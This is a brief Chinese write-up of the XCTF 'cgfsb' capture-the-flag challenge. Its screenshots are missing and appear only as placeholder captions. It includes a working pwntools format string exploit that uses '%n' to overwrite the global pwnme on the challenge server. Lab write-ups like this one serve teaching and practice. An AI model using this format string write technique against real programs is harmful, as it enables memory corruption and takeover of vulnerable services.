xctf - cgfsb

查看程序保护
在这里插入图片描述

用IDA 打开
在这里插入图片描述
查看24行代码可知,通过修改全局变量pwnme = 8 则结束。
使用gdb 动态调试。

漏洞代码;
在这里插入图片描述
pwnme 地址,
在这里插入图片描述
exp:

from pwn import *
sh = remote('111.198.29.45',36640)
sh.recv()
sh.sendline('hacker')
sh.recv()
payload = p32(0x804a068) +'aaaa' +'%10$n'
sh.sendline(payload)
sh.interactive()


本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!

相关文章

立即
投稿

微信公众账号

微信扫一扫加关注

返回
顶部